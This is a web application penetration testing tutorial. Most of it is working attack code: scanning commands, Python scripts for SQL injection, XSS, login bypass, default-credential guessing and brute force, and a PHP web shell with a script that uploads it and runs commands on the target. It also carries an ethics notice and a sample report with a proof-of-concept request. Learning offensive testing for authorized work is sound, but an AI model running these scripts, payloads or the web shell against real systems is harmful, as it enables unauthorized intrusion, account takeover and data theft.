Complete Penetration Testing Guide for Web Applications

⚠️ Ethical Hacking Notice

This tutorial is for educational purposes only. Only perform penetration testing on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and unethical.

Introduction to Web App Pen Testing

Web application penetration testing is a systematic approach to evaluating the security of web applications by simulating real-world attacks. This comprehensive guide will take you through the entire process, from initial reconnaissance to final reporting.

What is Penetration Testing?

Penetration testing (pen testing) is an authorized simulated cyberattack on a computer system, performed to evaluate the security of the system. The test is performed to identify weaknesses (also referred to as vulnerabilities), including the potential for unauthorized parties to gain access to the system's features and data.

📋 Prerequisites

• Basic understanding of web technologies (HTML, HTTP, JavaScript)
• Familiarity with networking concepts
• Basic Linux command line skills
• Understanding of common security vulnerabilities

Testing Methodology

A structured approach is crucial for effective penetration testing. We'll follow the OWASP Web Security Testing Guide methodology, which includes the following phases:

Information Gathering & Reconnaissance
Scanning & Enumeration
Vulnerability Assessment
Exploitation
Post-Exploitation
Reporting

Reconnaissance Phase

The reconnaissance phase involves gathering as much information as possible about the target application without directly interacting with it. This is also known as "passive reconnaissance."

Domain and Subdomain Discovery

Start by discovering all domains and subdomains associated with your target:

# Using subfinder for subdomain enumeration
subfinder -d target.com -o subdomains.txt

# Using amass for comprehensive subdomain discovery
amass enum -d target.com -o amass_subdomains.txt

# Using dnsrecon for DNS enumeration
dnsrecon -d target.com -t std

# Using dig for manual DNS queries
dig target.com ANY
dig @8.8.8.8 target.com MX

Technology Stack Identification

Identify the technologies used by the web application:

# Using whatweb to identify technologies
whatweb https://target.com

# Using wappalyzer (browser extension or CLI)
wappalyzer https://target.com

# Using curl to analyze HTTP headers
curl -I https://target.com

# Using nmap for service detection
nmap -sV -p 80,443 target.com

Google Dorking

Use Google search operators to find sensitive information:

# Find login pages
site:target.com intitle:"login" OR intitle:"sign in"

# Find admin panels
site:target.com intitle:"admin" OR intitle:"administrator"

# Find configuration files
site:target.com filetype:xml OR filetype:conf OR filetype:cnf

# Find database files
site:target.com filetype:sql OR filetype:db

# Find directory listings
site:target.com intitle:"index of"

# Find error messages that might reveal information
site:target.com "sql syntax near" OR "syntax error has occurred"

# Find backup files
site:target.com filetype:bak OR filetype:backup OR filetype:old

Scanning & Enumeration

In this phase, we actively probe the target application to discover services, directories, files, and potential entry points.

Port Scanning

# Comprehensive port scan with nmap
nmap -sS -sV -sC -O -A -p- target.com

# Specific service scans
nmap -p 80,443 --script=http-* target.com

# UDP scan for services
nmap -sU --top-ports 1000 target.com

# Scan for common web ports
nmap -p 80,443,8080,8443,8000,8888 target.com

Directory and File Discovery

# Using dirb for directory bruteforce
dirb https://target.com /usr/share/dirb/wordlists/common.txt

# Using gobuster for faster directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js

# Using ffuf for fuzzing
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u https://target.com/FUZZ

# Using feroxbuster (modern alternative)
feroxbuster -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,js

Web Application Crawling

#!/usr/bin/env python3
import requests
from urllib.parse import urljoin, urlparse
from bs4 import BeautifulSoup
import re

class WebCrawler:
    def __init__(self, start_url, max_depth=2):
        self.start_url = start_url
        self.max_depth = max_depth
        self.visited_urls = set()
        self.found_urls = set()
        self.forms = []
        self.session = requests.Session()
        
    def crawl(self, url, depth=0):
        if depth > self.max_depth or url in self.visited_urls:
            return
            
        try:
            print(f"[*] Crawling: {url} (depth: {depth})")
            response = self.session.get(url, timeout=10)
            self.visited_urls.add(url)
            
            if response.status_code == 200:
                self.analyze_page(response, url)
                
                # Find and crawl links
                soup = BeautifulSoup(response.text, 'html.parser')
                links = soup.find_all('a', href=True)
                
                for link in links:
                    new_url = urljoin(url, link['href'])
                    if self.is_same_domain(new_url):
                        self.found_urls.add(new_url)
                        self.crawl(new_url, depth + 1)
                        
        except Exception as e:
            print(f"[-] Error crawling {url}: {e}")
    
    def analyze_page(self, response, url):
        """Analyze page for interesting content"""
        soup = BeautifulSoup(response.text, 'html.parser')
        
        # Find forms
        forms = soup.find_all('form')
        for form in forms:
            form_data = {
                'url': url,
                'action': form.get('action', ''),
                'method': form.get('method', 'GET'),
                'inputs': []
            }
            
            inputs = form.find_all(['input', 'textarea', 'select'])
            for inp in inputs:
                form_data['inputs'].append({
                    'name': inp.get('name', ''),
                    'type': inp.get('type', 'text'),
                    'value': inp.get('value', '')
                })
            
            self.forms.append(form_data)
        
        # Look for comments with sensitive information
        comments = soup.find_all(string=lambda text: isinstance(text, str) and '<!--' in text)
        for comment in comments:
            if any(keyword in comment.lower() for keyword in ['password', 'admin', 'debug', 'todo']):
                print(f"[!] Interesting comment found in {url}: {comment.strip()}")
        
        # Look for JavaScript files
        scripts = soup.find_all('script', src=True)
        for script in scripts:
            script_url = urljoin(url, script['src'])
            print(f"[*] JavaScript file found: {script_url}")
    
    def is_same_domain(self, url):
        """Check if URL belongs to the same domain"""
        return urlparse(url).netloc == urlparse(self.start_url).netloc
    
    def generate_report(self):
        """Generate crawling report"""
        print("\n=== CRAWLING REPORT ===")
        print(f"URLs found: {len(self.found_urls)}")
        print(f"Forms found: {len(self.forms)}")
        
        print("\n--- Forms ---")
        for i, form in enumerate(self.forms):
            print(f"Form {i+1}: {form['url']} - {form['method']} {form['action']}")
            for inp in form['inputs']:
                print(f"  Input: {inp['name']} ({inp['type']})")

# Usage
crawler = WebCrawler("https://target.com", max_depth=2)
crawler.crawl(crawler.start_url)
crawler.generate_report()

Vulnerability Assessment

Once we have mapped the application, we can begin testing for specific vulnerabilities. We'll focus on the OWASP Top 10 vulnerabilities.

Automated Vulnerability Scanning

# Using Nikto for web server scanning
nikto -h https://target.com -output nikto_results.txt

# Using OWASP ZAP for comprehensive scanning
zap-cli quick-scan --self-contained --start-options '-config api.disablekey=true' https://target.com

# Using Nuclei for template-based scanning
nuclei -u https://target.com -t /path/to/nuclei-templates/

# Using SQLmap for SQL injection testing
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5

Exploitation Phase

In this phase, we attempt to exploit the vulnerabilities we've identified. Let's cover some common exploitation techniques.

SQL Injection Testing

SQL injection is one of the most critical web application vulnerabilities. Here's how to test for and exploit SQL injection vulnerabilities:

Manual SQL Injection Testing

#!/usr/bin/env python3
import requests
import time
from urllib.parse import quote

class SQLInjectionTester:
    def __init__(self, target_url, parameter):
        self.target_url = target_url
        self.parameter = parameter
        self.session = requests.Session()
        
    def test_error_based(self):
        """Test for error-based SQL injection"""
        print("[*] Testing for error-based SQL injection...")
        
        error_payloads = [
            "'", "''", "'"", "' OR '1'='1", "' OR 1=1--", 
            "' UNION SELECT NULL--", "' AND 1=0 UNION SELECT NULL, NULL--"
        ]
        
        for payload in error_payloads:
            test_url = f"{self.target_url}?{self.parameter}={quote(payload)}"
            
            try:
                response = self.session.get(test_url, timeout=10)
                
                # Check for common database error messages
                error_signatures = [
                    "SQL syntax", "mysql_fetch", "Warning: mysql",
                    "MySQLSyntaxErrorException", "valid MySQL result",
                    "PostgreSQL query failed", "Warning: pg_",
                    "valid PostgreSQL result", "Npgsql.",
                    "Driver][SQL Server]", "SQLServer JDBC Driver",
                    "SqlException", "OLE DB", "Microsoft Access Driver"
                ]
                
                for signature in error_signatures:
                    if signature.lower() in response.text.lower():
                        print(f"[!] Potential SQL injection found with payload: {payload}")
                        print(f"[!] Error signature detected: {signature}")
                        return True
                        
            except Exception as e:
                print(f"[-] Error testing payload {payload}: {e}")
        
        return False
    
    def test_time_based(self):
        """Test for time-based blind SQL injection"""
        print("[*] Testing for time-based SQL injection...")
        
        time_payloads = [
            "' OR SLEEP(5)--",
            "'; WAITFOR DELAY '00:00:05'--",
            "' OR pg_sleep(5)--",
            "' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND '1'='1"
        ]
        
        # Baseline request time
        baseline_time = self.measure_response_time(f"{self.target_url}?{self.parameter}=1")
        
        for payload in time_payloads:
            test_url = f"{self.target_url}?{self.parameter}={quote(payload)}"
            response_time = self.measure_response_time(test_url)
            
            if response_time - baseline_time >= 4:  # 4+ second delay indicates injection
                print(f"[!] Time-based SQL injection detected with payload: {payload}")
                print(f"[!] Response time: {response_time:.2f}s (baseline: {baseline_time:.2f}s)")
                return True
        
        return False
    
    def measure_response_time(self, url):
        """Measure response time for a URL"""
        try:
            start_time = time.time()
            self.session.get(url, timeout=15)
            return time.time() - start_time
        except Exception:
            return 0
    
    def test_union_based(self):
        """Test for UNION-based SQL injection"""
        print("[*] Testing for UNION-based SQL injection...")
        
        # First, determine the number of columns
        for i in range(1, 10):
            payload = f"' UNION SELECT {','.join(['NULL'] * i)}--"
            test_url = f"{self.target_url}?{self.parameter}={quote(payload)}"
            
            try:
                response = self.session.get(test_url, timeout=10)
                
                # If no error, we found the right number of columns
                if "error" not in response.text.lower() and len(response.text) > 100:
                    print(f"[!] Found {i} columns in the result set")
                    
                    # Try to extract database information
                    info_payload = f"' UNION SELECT {','.join(['NULL'] * (i-3) + ['database()', 'user()', 'version()'])}--"
                    info_url = f"{self.target_url}?{self.parameter}={quote(info_payload)}"
                    
                    info_response = self.session.get(info_url, timeout=10)
                    print(f"[*] Database info extraction attempt completed")
                    
                    return True
                    
            except Exception as e:
                continue
        
        return False

# Example usage
tester = SQLInjectionTester("https://target.com/search.php", "q")
tester.test_error_based()
tester.test_time_based()
tester.test_union_based()

Cross-Site Scripting (XSS) Testing

XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users.

XSS Testing Script

#!/usr/bin/env python3
import requests
from urllib.parse import quote
from bs4 import BeautifulSoup

class XSSTester:
    def __init__(self, target_url):
        self.target_url = target_url
        self.session = requests.Session()
        
    def test_reflected_xss(self, parameter):
        """Test for reflected XSS"""
        print(f"[*] Testing reflected XSS on parameter: {parameter}")
        
        xss_payloads = [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "<svg onload=alert('XSS')>",
            "javascript:alert('XSS')",
            "<iframe src=javascript:alert('XSS')>",
            "<body onload=alert('XSS')>",
            ""><script>alert('XSS')</script>",
            "'><script>alert('XSS')</script>",
            "</script><script>alert('XSS')</script>",
            "<ScRiPt>alert('XSS')</ScRiPt>",
            "<<SCRIPT>alert('XSS');//<</SCRIPT>"
        ]
        
        for payload in xss_payloads:
            test_url = f"{self.target_url}?{parameter}={quote(payload)}"
            
            try:
                response = self.session.get(test_url, timeout=10)
                
                # Check if payload is reflected in the response
                if payload.lower() in response.text.lower():
                    print(f"[!] Potential reflected XSS found with payload: {payload}")
                    
                    # Additional checks for proper context
                    soup = BeautifulSoup(response.text, 'html.parser')
                    scripts = soup.find_all('script')
                    
                    for script in scripts:
                        if script.string and 'alert' in script.string:
                            print("[!] Confirmed: Payload executed in script context")
                            return True
                            
            except Exception as e:
                print(f"[-] Error testing XSS payload: {e}")
        
        return False
    
    def test_stored_xss(self, form_data):
        """Test for stored XSS by submitting forms"""
        print("[*] Testing for stored XSS...")
        
        xss_payload = "<script>alert('Stored XSS')</script>"
        
        # Submit the payload
        try:
            response = self.session.post(self.target_url, data={**form_data, 'comment': xss_payload})
            print("[*] Payload submitted, checking if stored...")
            
            # Check if the payload is stored and executed
            check_response = self.session.get(self.target_url)
            if xss_payload.lower() in check_response.text.lower():
                print("[!] Stored XSS vulnerability confirmed!")
                return True
                
        except Exception as e:
            print(f"[-] Error testing stored XSS: {e}")
        
        return False
    
    def test_dom_xss(self):
        """Test for DOM-based XSS"""
        print("[*] Testing for DOM-based XSS...")
        
        dom_payloads = [
            "#<script>alert('DOM XSS')</script>",
            "#<img src=x onerror=alert('DOM XSS')>",
            "?name=<script>alert('DOM XSS')</script>"
        ]
        
        for payload in dom_payloads:
            test_url = f"{self.target_url}{payload}"
            
            try:
                response = self.session.get(test_url, timeout=10)
                
                # Look for JavaScript that processes URL fragments or parameters
                if "location.hash" in response.text or "document.URL" in response.text:
                    print(f"[!] Potential DOM XSS sink found with payload: {payload}")
                    return True
                    
            except Exception as e:
                continue
        
        return False

# Example usage
xss_tester = XSSTester("https://target.com/search.php")
xss_tester.test_reflected_xss("q")
xss_tester.test_dom_xss()

Authentication Bypass Testing

Testing authentication mechanisms is crucial for identifying ways attackers might bypass login systems.

#!/usr/bin/env python3
import requests
import itertools
from time import sleep

class AuthBypassTester:
    def __init__(self, login_url):
        self.login_url = login_url
        self.session = requests.Session()
        
    def test_sql_injection_bypass(self):
        """Test SQL injection authentication bypass"""
        print("[*] Testing SQL injection authentication bypass...")
        
        sqli_payloads = [
            ("admin'--", "anything"),
            ("admin'/*", "anything"),
            ("' OR '1'='1'--", "anything"),
            ("' OR 1=1#", "anything"),
            ("admin'; --", "anything"),
            ("' UNION SELECT 1,1,1--", "anything")
        ]
        
        for username, password in sqli_payloads:
            data = {
                'username': username,
                'password': password
            }
            
            try:
                response = self.session.post(self.login_url, data=data)
                
                # Check for successful login indicators
                if any(indicator in response.text.lower() for indicator in 
                      ['dashboard', 'welcome', 'logout', 'profile']):
                    print(f"[!] SQL injection bypass successful: {username}")
                    return True
                    
            except Exception as e:
                print(f"[-] Error testing SQL injection: {e}")
        
        return False
    
    def test_default_credentials(self):
        """Test common default credentials"""
        print("[*] Testing default credentials...")
        
        default_creds = [
            ('admin', 'admin'),
            ('admin', 'password'),
            ('admin', '123456'),
            ('administrator', 'administrator'),
            ('root', 'root'),
            ('admin', ''),
            ('guest', 'guest'),
            ('test', 'test'),
            ('user', 'user'),
            ('demo', 'demo')
        ]
        
        for username, password in default_creds:
            data = {
                'username': username,
                'password': password
            }
            
            try:
                response = self.session.post(self.login_url, data=data)
                
                if response.status_code == 200 and 'invalid' not in response.text.lower():
                    print(f"[!] Default credentials found: {username}:{password}")
                    return True
                    
                sleep(1)  # Rate limiting
                
            except Exception as e:
                continue
        
        return False
    
    def test_username_enumeration(self, usernames):
        """Test for username enumeration"""
        print("[*] Testing username enumeration...")
        
        valid_usernames = []
        
        for username in usernames:
            data = {
                'username': username,
                'password': 'wrongpassword123'
            }
            
            try:
                response = self.session.post(self.login_url, data=data)
                
                # Look for different error messages
                if 'password' in response.text.lower() and 'username' not in response.text.lower():
                    print(f"[!] Valid username found: {username}")
                    valid_usernames.append(username)
                elif len(response.text) != len(self.session.post(self.login_url, 
                    data={'username': 'nonexistentuser123', 'password': 'wrongpassword123'}).text):
                    print(f"[!] Possible valid username (different response length): {username}")
                    valid_usernames.append(username)
                
                sleep(0.5)
                
            except Exception as e:
                continue
        
        return valid_usernames
    
    def test_brute_force(self, username, password_list):
        """Test brute force attack (use responsibly and with rate limiting)"""
        print(f"[*] Testing brute force for user: {username}")
        
        for password in password_list:
            data = {
                'username': username,
                'password': password
            }
            
            try:
                response = self.session.post(self.login_url, data=data)
                
                if any(indicator in response.text.lower() for indicator in 
                      ['dashboard', 'welcome', 'logout', 'profile']):
                    print(f"[!] Password found for {username}: {password}")
                    return password
                
                sleep(2)  # Important: Rate limiting to avoid detection/blocking
                
            except Exception as e:
                continue
        
        return None

# Example usage
auth_tester = AuthBypassTester("https://target.com/login")
auth_tester.test_sql_injection_bypass()
auth_tester.test_default_credentials()

usernames = ['admin', 'administrator', 'user', 'test', 'guest']
valid_users = auth_tester.test_username_enumeration(usernames)

# Only use brute force on your own systems or with explicit permission
# passwords = ['password', '123456', 'admin', 'letmein']
# auth_tester.test_brute_force('admin', passwords)

Post-Exploitation

After successfully exploiting a vulnerability, the post-exploitation phase involves maintaining access, escalating privileges, and gathering additional information.

File Upload Exploitation

#!/usr/bin/env python3
import requests

def create_web_shell():
    """Create a simple PHP web shell"""
    web_shell_content = '''<?php
    if(isset($_GET['cmd'])) {
        echo "<pre>";
        system($_GET['cmd']);
        echo "</pre>";
    } else {
        echo "Web shell active. Use ?cmd=command";
    }
    ?>'''
    
    return web_shell_content

def test_file_upload(upload_url, file_param='file'):
    """Test file upload functionality for web shell upload"""
    
    # Create web shell
    shell_content = create_web_shell()
    
    # Try different file extensions
    extensions = ['.php', '.php3', '.php4', '.php5', '.phtml', '.asp', '.aspx', '.jsp']
    
    for ext in extensions:
        filename = f"shell{ext}"
        
        files = {
            file_param: (filename, shell_content, 'application/octet-stream')
        }
        
        try:
            response = requests.post(upload_url, files=files)
            
            if response.status_code == 200 and 'error' not in response.text.lower():
                print(f"[!] Potential successful upload: {filename}")
                
                # Try to access the uploaded file
                possible_paths = [
                    f"/uploads/{filename}",
                    f"/files/{filename}",
                    f"/upload/{filename}",
                    f"/{filename}"
                ]
                
                base_url = upload_url.rsplit('/', 1)[0]
                
                for path in possible_paths:
                    test_url = f"{base_url}{path}?cmd=whoami"
                    test_response = requests.get(test_url)
                    
                    if test_response.status_code == 200 and len(test_response.text) > 10:
                        print(f"[!] Web shell accessible at: {test_url}")
                        return test_url
                        
        except Exception as e:
            print(f"[-] Error uploading {filename}: {e}")
    
    return None

# Example usage
shell_url = test_file_upload("https://target.com/upload.php")
if shell_url:
    print(f"[+] Web shell deployed successfully: {shell_url}")

Documentation & Reporting

Proper documentation and reporting are crucial components of penetration testing. A good report should be clear, actionable, and provide both technical details and business impact.

Report Structure

Executive Summary - High-level overview for management
Technical Summary - Detailed findings for technical teams
Methodology - Testing approach and scope
Findings - Detailed vulnerability descriptions
Risk Assessment - Impact and likelihood ratings
Recommendations - Specific remediation steps
Appendices - Technical details and evidence

Sample Vulnerability Report Entry

SQL Injection Vulnerability

Severity: Critical

CVSS Score: 9.8 (Critical)

Affected URL: https://target.com/search.php?q=

Parameter: q (GET)

Description

The search functionality is vulnerable to SQL injection attacks. An attacker can manipulate the 'q' parameter to execute arbitrary SQL commands, potentially leading to complete database compromise.

Proof of Concept

GET /search.php?q=' UNION SELECT database(),user(),version()-- HTTP/1.1 Host: target.com

Impact

• Complete database compromise
• Unauthorized access to sensitive data
• Potential for data modification or deletion
• Possible server compromise via file system access

Remediation

• Use parameterized queries/prepared statements
• Implement proper input validation and sanitization
• Apply the principle of least privilege to database accounts
• Enable SQL query logging and monitoring

Essential Tools

Here are the essential tools every web application penetration tester should know:

Reconnaissance Tools

Nmap - Network discovery and port scanning
Subfinder - Subdomain enumeration
Amass - Comprehensive subdomain discovery
Whatweb - Technology identification
Shodan - Internet-connected device search engine

Vulnerability Scanners

OWASP ZAP - Web application security scanner
Burp Suite - Comprehensive web security testing platform
Nikto - Web server scanner
Nuclei - Template-based vulnerability scanner

Exploitation Tools

SQLmap - Automated SQL injection exploitation
XSSHunter - XSS payload testing platform
Commix - Command injection exploitation
Metasploit - Penetration testing framework

Directory/File Discovery

Gobuster - Fast directory/file brute-forcer
Dirb - Web content scanner
Feroxbuster - Fast content discovery tool
FFUF - Fast web fuzzer

Conclusion & Best Practices

Web application penetration testing is a systematic process that requires patience, methodology, and continuous learning. Remember these key principles:

Testing Best Practices

Always get proper authorization before testing any system
Follow a methodology to ensure comprehensive coverage
Document everything - findings, steps, and evidence
Test thoroughly but avoid causing damage or disruption
Stay updated on latest vulnerabilities and techniques

Ethical Considerations

Only test systems you own or have explicit permission to test
Respect scope limitations and rules of engagement
Report vulnerabilities responsibly
Protect sensitive data discovered during testing
Follow responsible disclosure practices

Continuous Learning

Cybersecurity is constantly evolving. Stay current by:

Following security research and CVE databases
Practicing on legal platforms like HackTheBox, TryHackMe
Attending security conferences and training
Participating in bug bounty programs (ethically)
Contributing to the security community

🎯 Key Takeaways

• Systematic methodology is crucial for comprehensive testing
• Combine automated tools with manual testing techniques
• Proper documentation and reporting are as important as finding vulnerabilities
• Always follow ethical guidelines and legal requirements
• Continuous learning and practice are essential in cybersecurity

This guide provides a foundation for web application penetration testing. Remember that real-world applications often have unique characteristics and defenses, so adapt your approach accordingly and always prioritize ethical, responsible testing practices.

Table of Contents

Tutorial Info